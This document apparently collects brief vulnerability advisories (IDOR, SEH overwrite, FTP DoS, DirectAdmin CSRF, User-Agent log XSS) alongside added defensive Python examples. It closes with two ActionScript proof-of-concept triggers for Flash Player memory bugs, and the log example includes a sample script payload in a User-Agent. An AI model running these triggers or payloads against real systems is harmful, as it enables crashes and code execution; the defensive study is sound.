An insecure direct object reference (IDOR) occurs when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly, for example databases or files. Here a remote attacker can exploit it to delete a message in the application. The vulnerability is located in the `messageId` value of the `/main/messages/delete.php` POST request.
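The authorization gap behind an IDOR of this kind is easiest to see with the delete handler written two ways. The following is an added example, not the vulnerable application's code: the in-memory store, the user ids and the messages are constructed, and the handler names are hypothetical. The vulnerable version resolves the row straight from the submitted messageId; the hardened version additionally checks that the row belongs to the authenticated user, and returns the same response for "no such row" and "not your row" so the error text cannot be used to confirm which ids exist.

```python
"""Added example (not the application's own code): a message-delete
handler without and with an object-level authorization check (IDOR).
The store, user ids and messages below are constructed sample data."""
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Message:
    message_id: int
    owner_id: int
    body: str


class MessageStore:
    """Constructed stand-in for the application's messages table."""

    def __init__(self) -> None:
        self.messages: Dict[int, Message] = {}

    def add(self, owner_id: int, body: str) -> int:
        message_id = len(self.messages) + 1
        self.messages[message_id] = Message(message_id, owner_id, body)
        return message_id


def parse_message_id(raw) -> Optional[int]:
    """POST fields arrive as strings; accept only a positive integer."""
    try:
        value = int(raw)
    except (TypeError, ValueError):
        return None
    return value if value > 0 else None


def delete_message_vulnerable(store: MessageStore, current_user: int, raw_id) -> str:
    """Looks the row up by the user-supplied messageId and deletes it.
    The caller's identity is never compared with the row's owner, so any
    logged-in user can delete anyone's message: the IDOR."""
    message_id = parse_message_id(raw_id)
    if message_id is None:
        return "bad request"
    if message_id not in store.messages:
        return "not found"
    del store.messages[message_id]
    return "deleted"


def delete_message_hardened(store: MessageStore, current_user: int, raw_id) -> str:
    """Same handler with the ownership check the vulnerable one lacks."""
    message_id = parse_message_id(raw_id)
    if message_id is None:
        return "bad request"
    message = store.messages.get(message_id)
    # One response for "no such row" and "not your row": the error text then
    # cannot be used to enumerate which message ids exist.
    if message is None or message.owner_id != current_user:
        return "not found"
    del store.messages[message_id]
    return "deleted"


def build_sample_store() -> MessageStore:
    """Constructed data: user 1 owns message 1, user 2 owns message 2."""
    store = MessageStore()
    store.add(owner_id=1, body="first user's message")
    store.add(owner_id=2, body="second user's message")
    return store


if __name__ == "__main__":
    # User 2 submits messageId=1 (a message owned by user 1) to each handler.
    store = build_sample_store()
    print("vulnerable:", delete_message_vulnerable(store, current_user=2, raw_id="1"))
    store = build_sample_store()
    print("hardened:  ", delete_message_hardened(store, current_user=2, raw_id="1"))
```

The check belongs in the handler that performs the action, not only in the page that renders the delete button: the request in the write-up is a plain POST, so anything enforced only in the UI is bypassed by sending the request directly.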
The STIMS Cutter application is vulnerable to an SEH overwrite. The vulnerability can be triggered by creating a malicious cutt file and opening it in the STIMS Cutter application: when the user clicks Build Report, the application crashes because the SEH record is overwritten.
A buffer overflow vulnerability exists in STIMS Buffer version 1.1.20 which allows an attacker to overwrite the SEH pointer and execute arbitrary code. To exploit it, an attacker must create a malicious buff file and open it in the STIMSBuffer application; when the View Report button is clicked, the SEH pointer is overwritten and arbitrary code can be executed.
This exploit causes a denial of service against XM Easy Personal FTP Server 5.8.0: it sends a malicious HELP command carrying a buffer of 4500 "A" characters to the FTP server, causing it to crash.
DirectAdmin is a web-based hosting control panel. As seen in the code, the original form includes no CSRF protection or secret token. An attacker can craft a malicious HTML page containing a form with hidden fields that submits a request to the vulnerable application; this can be used to create a new user account with administrative privileges.
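Why a form that relies on the session cookie alone can be submitted from another site, and what the missing token does, is shown below in an added example that is not DirectAdmin's code. The server secret, the session id, the form fields and the site origin `https://panel.example` are all constructed; the handler names are hypothetical. The hardened handler binds a token to the session with an HMAC, compares it in constant time, and rejects a request whose Origin header names another site.

```python
"""Added example (not DirectAdmin's code): a user-creation form handler
without and with CSRF protection. Secret, session id, origin and form
fields are constructed sample values."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed per-deployment secret; a real service loads it from configuration.
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://panel.example"  # constructed origin of the control panel


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC-SHA256(secret, session_id). The site
    renders it into a hidden field of its own form; a page on another origin
    cannot read it, because it sees neither the victim's session id nor the
    secret."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def create_user_vulnerable(session_id: Optional[str], form: Dict[str, str],
                           users: Dict[str, str]) -> str:
    """Trusts the session cookie alone. The browser attaches that cookie to a
    POST triggered by a hostile page just as it does to the site's own form,
    so the forged request passes."""
    if session_id is None:
        return "login required"
    users[form["username"]] = form.get("role", "user")
    return "created"


def create_user_hardened(session_id: Optional[str], form: Dict[str, str],
                         users: Dict[str, str], origin: Optional[str] = None) -> str:
    """Requires a valid session-bound token in the form and, when the browser
    sent an Origin header, that it matches the site's own origin."""
    if session_id is None:
        return "login required"
    if origin is not None and origin != SITE_ORIGIN:
        return "rejected: cross-site origin"
    submitted = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    # Constant-time comparison so the check does not leak token bytes via timing.
    if not hmac.compare_digest(submitted, expected):
        return "rejected: bad csrf token"
    users[form["username"]] = form.get("role", "user")
    return "created"


VICTIM_SESSION = "sess-constructed-1234"

# The hidden fields a hostile page would submit (constructed); it has no token.
FORGED_FORM = {"username": "newadmin", "role": "admin"}


def legitimate_form() -> Dict[str, str]:
    """The form as the site itself renders it for this session, token included."""
    return {"username": "newadmin", "role": "admin",
            "csrf_token": issue_csrf_token(VICTIM_SESSION)}


if __name__ == "__main__":
    users: Dict[str, str] = {}
    print(create_user_vulnerable(VICTIM_SESSION, FORGED_FORM, users), users)
    users = {}
    print(create_user_hardened(VICTIM_SESSION, FORGED_FORM, users,
                               origin="https://evil.example"), users)
    print(create_user_hardened(VICTIM_SESSION, legitimate_form(), users,
                               origin=SITE_ORIGIN), users)
```

The Origin check is a second, independent layer: browsers omit or blank the header in some cases, so it is not a replacement for the token, but when present and wrong it lets the server reject the request before any token handling.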
User-Agent information can be used to attack a website in the following way. The attacker changes their User-Agent to include dangerous JavaScript (an XSS payload, for example) and then requests a page on the target server. The server saves the User-Agent in access.log, so when the administrator reads the log, the JavaScript that was added to the User-Agent executes.
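The log file itself is inert; the script runs only if the tool that displays the log writes the User-Agent into a page unencoded. The following added example, which is not from the original write-up, parses Apache combined-format lines and renders them both the naive way and with output encoding, and adds a small detection hook for User-Agent values that carry markup. The two log lines are constructed.

```python
"""Added example (not from the write-up): parsing Apache combined-format
access-log lines and rendering them as HTML with output encoding, so a
User-Agent that carries script is displayed rather than executed in the
administrator's browser. The log lines are constructed sample data."""
import html
import re
from typing import Dict, List, Optional

COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Constructed sample: one ordinary request and one whose User-Agent is an
# HTML/script payload of the kind the write-up describes.
SAMPLE_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" '
    '200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php HTTP/1.1" '
    '200 2326 "-" "<script>alert(1)</script>"',
]

DISPLAY_FIELDS = ("client", "time", "request", "status", "user_agent")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def render_row_unsafe(entry: Dict[str, str]) -> str:
    """What a naive log viewer does: raw field values straight into the page,
    so markup in the User-Agent becomes part of the document."""
    cells = "".join(f"<td>{entry[k]}</td>" for k in DISPLAY_FIELDS)
    return f"<tr>{cells}</tr>"


def render_row(entry: Dict[str, str]) -> str:
    """Same row with every attacker-controlled field HTML-escaped. The request
    line and referer are encoded too: they are as user-controlled as the
    User-Agent."""
    cells = "".join(f"<td>{html.escape(entry[k], quote=True)}</td>" for k in DISPLAY_FIELDS)
    return f"<tr>{cells}</tr>"


# Markup or script-handler fragments that have no business in a User-Agent.
SUSPICIOUS = re.compile(r"<\s*/?\s*(script|img|svg|iframe)|javascript:|\bon\w+\s*=", re.IGNORECASE)


def suspicious_user_agent(entry: Dict[str, str]) -> bool:
    """Detection hook: flag User-Agent values carrying tags or event handlers,
    so an alert can fire when the line is logged, not when someone views it."""
    return bool(SUSPICIOUS.search(entry["user_agent"]))


def render_log(lines: List[str]) -> str:
    """Render a whole log as a table; malformed lines are skipped, never echoed raw."""
    rows = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        rows.append(render_row(entry))
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        entry = parse_combined(line)
        print("suspicious" if suspicious_user_agent(entry) else "ok       ", entry["user_agent"])
    print(render_log(SAMPLE_LINES))
```

Encoding at render time is the fix regardless of what was logged; the detection regex is deliberately narrow and is there to raise an alert on the write, not to sanitise the stored line, which should stay intact as evidence.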
A heap overflow vulnerability exists in Adobe Flash Player when processing MP4 files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.
A heap overflow vulnerability was discovered in the URLStream class due to an issue in ATF processing. The attached file causes a crash due to the vulnerability.
There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:

    var lv = new LoadVars();
    var f = lv.decode;
    var tf = this.createTextField('tf', 1, 2, 3, 4, 5);
    tf.natalie = 'not test';
    tf.watch('natalie', func);
    f.call(tf, 'natalie=test&bob=1');
    trace(tf.natalie);
    function func() {
        trace('here');
        tf.removeTextField();
        return 'test';
    }
There is a dangling pointer that can be read, but not written to, in loadPCMFromByteArray. A minimal PoC is as follows:

    var s = new Sound();
    var b = new ByteArray();
    for (var i = 0; i < 1600; i++) {
        b.writeByte(1);
    }
    b.position = 0;
    s.loadPCMFromByteArray(b, 100, "float", false, 2.0);
    var c = new ByteArray();
    for (var i = 0; i < 2; i++) {
        c.writeByte(1);
    }
    c.position = 0;
    try {
        s.loadPCMFromByteArray(c, 1, "float", false, 2.0);
    } catch (e:Error) {
        trace(e.message);
    }
    var d = new ByteArray();
    s.extract(d, 1, 0);

The PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again with a specific array length that passes the array length check but causes an exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but the function then exits due to the exception before the pointer is set again. If the exception is caught, the Sound object containing the dangling pointer can be used again. The Sound.extract method reads directly from the location the dangling pointer points to.